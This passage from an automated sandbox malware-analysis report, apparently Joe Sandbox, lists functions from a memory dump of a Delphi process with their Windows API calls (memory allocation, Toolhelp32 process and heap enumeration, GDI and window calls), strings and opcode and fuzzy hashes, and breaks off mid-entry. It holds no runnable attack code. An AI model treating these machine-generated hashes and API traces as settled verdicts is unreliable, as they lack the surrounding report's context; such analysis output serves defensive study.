Instruction Fuzzy Hash: F8C08CE0302200362A54FAFC3EC801A02C989042397280F21A038C2BE2E327CC23B470

Uniqueness

Uniqueness Score: -1.00%

Function 02D78730 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02D78724,00000000,00000001), ref: 02D78740

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 55b8c8785a3236456db655d6b578f4aa62083d4c93b51cf4da98e96055961173
Instruction ID: b834474d0b53a8b1c7c987e23bcb6cc6784e3bced6c49dd8720752fe948cb17c
Opcode Fuzzy Hash: 55b8c8785a3236456db655d6b578f4aa62083d4c93b51cf4da98e96055961173
Instruction Fuzzy Hash: E8C092F07C6300BBF61096A92CE2FA3929DD308B00F600811BE05EE3C2E2F65C6026B0

Uniqueness

Uniqueness Score: -1.00%

Function 02D14F40 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D14F47

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction ID: 1c9c0f82e57cea9eb41390fa1a3a3df740f1e5b84f3a7cfaa10f54fe0b1ef256
Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
Instruction Fuzzy Hash: 9EB0122834C24130FB1020A13D01732019C5F00348F8400619E1CC4FC5EB05CC16D835

Uniqueness

Uniqueness Score: -1.00%

Function 02D14F58 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02D14F5F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: bd39776b076f6af8f38c0dfbbec83bbd8ce8162656848b3a59b1dbb085e3510c
Instruction ID: 37fdd966c412bb3308f103a50739789ad5e6ae6e336c6df377f9cd424973543c
Opcode Fuzzy Hash: bd39776b076f6af8f38c0dfbbec83bbd8ce8162656848b3a59b1dbb085e3510c
Instruction Fuzzy Hash: 95A011AC000303A88A0A22282000A2A2023AEC0208B88C0A802000AA008A3A8800C820

Uniqueness

Uniqueness Score: -1.00%

Function 02D2E98C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 02D2E9AA

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1b35e77876ea7cbc78eb3bcbb87f519612d0cdf7d20947fab1a2edc616b83793
Instruction ID: 8848c338632ca5147fbfa4e5e37a3900ae87d19cde8d70c2b9d5b421c44fc139
Opcode Fuzzy Hash: 1b35e77876ea7cbc78eb3bcbb87f519612d0cdf7d20947fab1a2edc616b83793
Instruction Fuzzy Hash: 661157346403159BCB10DF18C880B82FBE6EF98350F10C53AE9989B785D370ED18CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D11668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D11A9F,?,02D1209C), ref: 02D1167E

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e040835825575bc28d5e81d8230b12435e5c1fee1142d4eaa0dcf72771e07b25
Instruction ID: 99d21b6312b16384a293eba8f3484ebe044c76da254e45ec7272fe48e90c027b
Opcode Fuzzy Hash: e040835825575bc28d5e81d8230b12435e5c1fee1142d4eaa0dcf72771e07b25
Instruction Fuzzy Hash: 7BF0E7F0B513005BEB46DF79A960B127BF2E789344F148679E609DB798E7718C16CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02D1171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D1209C), ref: 02D11740

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a6be0d28261e31fd8c8f0e8344a21c53a84d942c7ce11c4f20677e6646439df5
Instruction ID: 5f8f6dff7350426e435a1600270aa834ee516ad4aa218219b78258147f1fc2e4
Opcode Fuzzy Hash: a6be0d28261e31fd8c8f0e8344a21c53a84d942c7ce11c4f20677e6646439df5
Instruction Fuzzy Hash: 0DF09AB2B416557BD3108E5AAC80B52BB94FB00360F05453AEA4C97740D7B1AC108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D11782 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02D12080), ref: 02D117A0

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: db54280c72c565f62fcb33a8991cd9733451edcb58066d1bc6b3d66851057c4a
Instruction ID: 700fca4d7d93db368f6695dfb35a15044af6269ac4816da332f60787f13537a3
Opcode Fuzzy Hash: db54280c72c565f62fcb33a8991cd9733451edcb58066d1bc6b3d66851057c4a
Instruction Fuzzy Hash: 7CE04665301301BEE7105A7A6C80B12ABD8EB486A1F284866E689DB781D760EC00CBA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02D687CC Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02D68A53,?,?,02D68AE5,00000000,02D68BC1), ref: 02D687E0
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02D687F8
GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02D6880A
GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02D6881C
GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02D6882E
GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02D68840
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02D68852
GetProcAddress.KERNEL32(00000000,Process32First), ref: 02D68864
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02D68876
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02D68888
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02D6889A
GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02D688AC
GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02D688BE
GetProcAddress.KERNEL32(00000000,Module32First), ref: 02D688D0
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02D688E2
GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02D688F4
GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02D68906

Strings

Process32Next, xrefs: 02D6886E
Thread32Next, xrefs: 02D688B6
Heap32ListFirst, xrefs: 02D68802
Process32First, xrefs: 02D6885C
Toolhelp32ReadProcessMemory, xrefs: 02D6884A
CreateToolhelp32Snapshot, xrefs: 02D687F0
Heap32ListNext, xrefs: 02D68814
Module32Next, xrefs: 02D688DA
Thread32First, xrefs: 02D688A4
Module32NextW, xrefs: 02D688FE
Heap32First, xrefs: 02D68826
Process32FirstW, xrefs: 02D68880
kernel32.dll, xrefs: 02D687DB
Module32First, xrefs: 02D688C8
Process32NextW, xrefs: 02D68892
Heap32Next, xrefs: 02D68838
Module32FirstW, xrefs: 02D688EC

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 23e6b62b13578203d095ce93e60a7f0178f62f43875802a0539c60bace5bca85
Instruction ID: ef75228eea516f8c1f8594657f71703cc1153fe0d43112fb43555ffa97946485
Opcode Fuzzy Hash: 23e6b62b13578203d095ce93e60a7f0178f62f43875802a0539c60bace5bca85
Instruction Fuzzy Hash: 8F31BBB0980710AFEB04EBB4A98DF7537AAEB15700B000A66A416DFB04D775DC58DFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D34F70 Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 02D34FF0
GetDC.USER32(00000000), ref: 02D35001
CreateCompatibleDC.GDI32(00000000), ref: 02D35012
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 02D3505E
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 02D35082
SelectObject.GDI32(?,?), ref: 02D352DF
SelectPalette.GDI32(?,00000000,00000000), ref: 02D3531F
RealizePalette.GDI32(?), ref: 02D3532B
SetTextColor.GDI32(?,00000000), ref: 02D35394
SetBkColor.GDI32(?,00000000), ref: 02D353AE
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,00000000,02D3553C,?,00000000,02D3555E,?,00000000,02D3556F), ref: 02D353F6
FillRect.USER32(?,?,00000000), ref: 02D3537C

Part of subcall function 02D31CE0: GetSysColor.USER32(?), ref: 02D31CEA

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 02D35418
CreateCompatibleDC.GDI32(00000028), ref: 02D3542B
SelectObject.GDI32(?,00000000), ref: 02D3544E
SelectPalette.GDI32(?,00000000,00000000), ref: 02D3546A
RealizePalette.GDI32(?), ref: 02D35475
SetTextColor.GDI32(?,00000000), ref: 02D35493
SetBkColor.GDI32(?,00000000), ref: 02D354AD
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02D354D5
SelectPalette.GDI32(?,00000000,000000FF), ref: 02D354E7
SelectObject.GDI32(?,00000000), ref: 02D354F1
DeleteDC.GDI32(?), ref: 02D3550C

Part of subcall function 02D32A9C: CreateBrushIndirect.GDI32(?), ref: 02D32B47

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 01ad3969407f7944913d87d10ac6fdcdf21c11d7bb40302329f566f728ffeaa3
Instruction ID: 7f2effa56e75bfeb08b0aa4c6eac8dc658c4cc32c1907dcd21dd220868f25682
Opcode Fuzzy Hash: 01ad3969407f7944913d87d10ac6fdcdf21c11d7bb40302329f566f728ffeaa3
Instruction Fuzzy Hash: 5012C475A00208AFDB11EFA8D984F9EB7BAEB08310F558555F918EB391C775ED80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02D63148 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

vcltest3.dll, xrefs: 02D63549
RegisterAutomation, xrefs: 02D6356A

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: 07c7b3961d9c69a514e56178e0a65f0531e7bb6f02c35dda1a63def6421c5c9b
Instruction ID: 570f053744ffed6e5b629f5a7e523ec0954370df8b1af80b8f5f7f1a37dad6e1
Opcode Fuzzy Hash: 07c7b3961d9c69a514e56178e0a65f0531e7bb6f02c35dda1a63def6421c5c9b
Instruction Fuzzy Hash: 3BE12C35A04204EFDB94DBA8C58CAADBBF6EF49B14F5481E4E845AB751C734EE80CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02D15C18 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02D17A28,02D10000,02D7A794), ref: 02D15C35
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02D15C4C
lstrcpynA.KERNEL32(?,?,?), ref: 02D15C7C
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02D17A28,02D10000,02D7A794), ref: 02D15CE0
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02D17A28,02D10000,02D7A794), ref: 02D15D16
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02D17A28,02D10000,02D7A794), ref: 02D15D29
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D17A28,02D10000,02D7A794), ref: 02D15D3B
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D17A28,02D10000,02D7A794), ref: 02D15D47
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D17A28,02D10000), ref: 02D15D7B
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D17A28), ref: 02D15D87
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02D15DA9

Strings

kernel32.dll, xrefs: 02D15C30
\, xrefs: 02D15D59
GetLongPathNameA, xrefs: 02D15C43

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: 67f00b680831b6ca825c2f03f3335a55961a20949f991449d6431831baa993b2
Instruction ID: 3ab3c93e945e2d5815bde20258141b9a248f48db60f21cb77f86aba1cbc69e28
Opcode Fuzzy Hash: 67f00b680831b6ca825c2f03f3335a55961a20949f991449d6431831baa993b2
Instruction Fuzzy Hash: 744148B1E00259BFDB10DAA8EC88ADEB7AAEF88200F4445A5E549E7700D774DE44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02D5FC84 Relevance: 20.0, APIs: 13, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 830b8761ae573973b1a7a1ab3f35ee734492ccf21bb5c58d8c2d34ff08e2e385
Instruction ID: 7b745eedb317f6d65226ba10f4f5c30aaba9a4a17fe2cd4e21bf2f3392c841b8
Opcode Fuzzy Hash: 830b8761ae573973b1a7a1ab3f35ee734492ccf21bb5c58d8c2d34ff08e2e385
Instruction Fuzzy Hash: 31025A35A00254EFDB11DBA8D988FAD77F6EB09300F2544A0E908EB7A2D775EE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02D15EE8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON

Download Yara Rule

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D15EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D15F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D15F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D15F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D15F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D15F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D15FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D15FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D15FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D15FFB

Strings

Software\Borland\Locales, xrefs: 02D15E0C, 02D15E2A
Software\Borland\Delphi\Locales, xrefs: 02D15E48

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction ID: b6ecfaf161d2d8f61fb8064e1b8f51285c23e3bf157fccb783e44011f552e052
Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
Instruction Fuzzy Hash: 55315271E0025C3AEB25D6B8FC46BEE67AD9B04380F4481A1A649E7681D674CE44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D521F8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02D52207
GetWindowPlacement.USER32(?,0000002C), ref: 02D52224
GetWindowRect.USER32(?), ref: 02D5223D
GetWindowLongA.USER32(?,000000F0), ref: 02D5224B
GetWindowLongA.USER32(?,000000F8), ref: 02D52260
ScreenToClient.USER32(00000000), ref: 02D5226D
ScreenToClient.USER32(00000000,?), ref: 02D52278

Strings

,, xrefs: 02D52210

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 00e4d20715d9378f19c9d611c7f9004db6b78f7f6f56d6401c992190e6656228
Instruction ID: 93aaa5c0c2eacfcf6bb7443b5b9dc7c52a4d7e20719465b34bd60d93d04ff1f1
Opcode Fuzzy Hash: 00e4d20715d9378f19c9d611c7f9004db6b78f7f6f56d6401c992190e6656228
Instruction Fuzzy Hash: 98115B71508310ABDB01EFACD884A8BB7E9EF49310F048669BD58CB356D771DD04CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02D43DAC Relevance: 10.9, APIs: 7, Instructions: 405COMMON

Download Yara Rule

APIs

SaveDC.GDI32(?), ref: 02D4407C
RestoreDC.GDI32(?,?), ref: 02D440F0
GetWindowDC.USER32(?,00000000,02D442E0), ref: 02D4416A
SaveDC.GDI32(?), ref: 02D441A1
RestoreDC.GDI32(?,?), ref: 02D4420E
DefWindowProcA.USER32(?,?,?,?,00000000,02D442E0), ref: 02D442C2

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: RestoreSaveWindow$Proc
String ID:
API String ID: 1975259465-0
Opcode ID: ddab6a2e6749ebd02019bb05714b3f9fc951387d6046b34d40dc391e2ba5b141
Instruction ID: fa2243a4a92c949a2c4451012185ccebd0dcb46fc8147b279c738438544dc2c9
Opcode Fuzzy Hash: ddab6a2e6749ebd02019bb05714b3f9fc951387d6046b34d40dc391e2ba5b141
Instruction Fuzzy Hash: FBE12A34A046059FDB10DFA9D980AAEF7F6FF48304B2586A5E851A7754CB30ED81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D5C4B4 Relevance: 10.8, APIs: 7, Instructions: 332windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000), ref: 02D5C57B
SaveDC.GDI32(?), ref: 02D5C739
RestoreDC.GDI32(?,?), ref: 02D5C7AA
GetWindowDC.USER32(00000000), ref: 02D5C816
SaveDC.GDI32(?), ref: 02D5C84D
RestoreDC.GDI32(?,?), ref: 02D5C8B1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: 9959d987014fceda0f7881c6edcbda334ab8f8df9da9fd0d782bfecddf289ef0
Instruction ID: 2c5602acfe2b89d21425db59f38e74786dcb3bba2efd23ac7b17b550da7a7035
Opcode Fuzzy Hash: 9959d987014fceda0f7881c6edcbda334ab8f8df9da9fd0d782bfecddf289ef0
Instruction Fuzzy Hash: C9C15B30A10214EFDF15DB68C985BAEB3F6EB46304F1544A6E845AB760DBB4EE40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02D6393C Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 02D63944
SetActiveWindow.USER32(?,?,?,?,02D6333E,00000000,02D63812), ref: 02D63955
IsWindowEnabled.USER32(00000000), ref: 02D63978
DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,02D6333E,00000000,02D63812), ref: 02D63991
SetWindowPos.USER32(?,00000000,00000000,?,?,02D6333E,00000000,02D63812), ref: 02D639D7
SetFocus.USER32(00000000,?,00000000,00000000,?,?,02D6333E,00000000,02D63812), ref: 02D63A25

Memory Dump Source

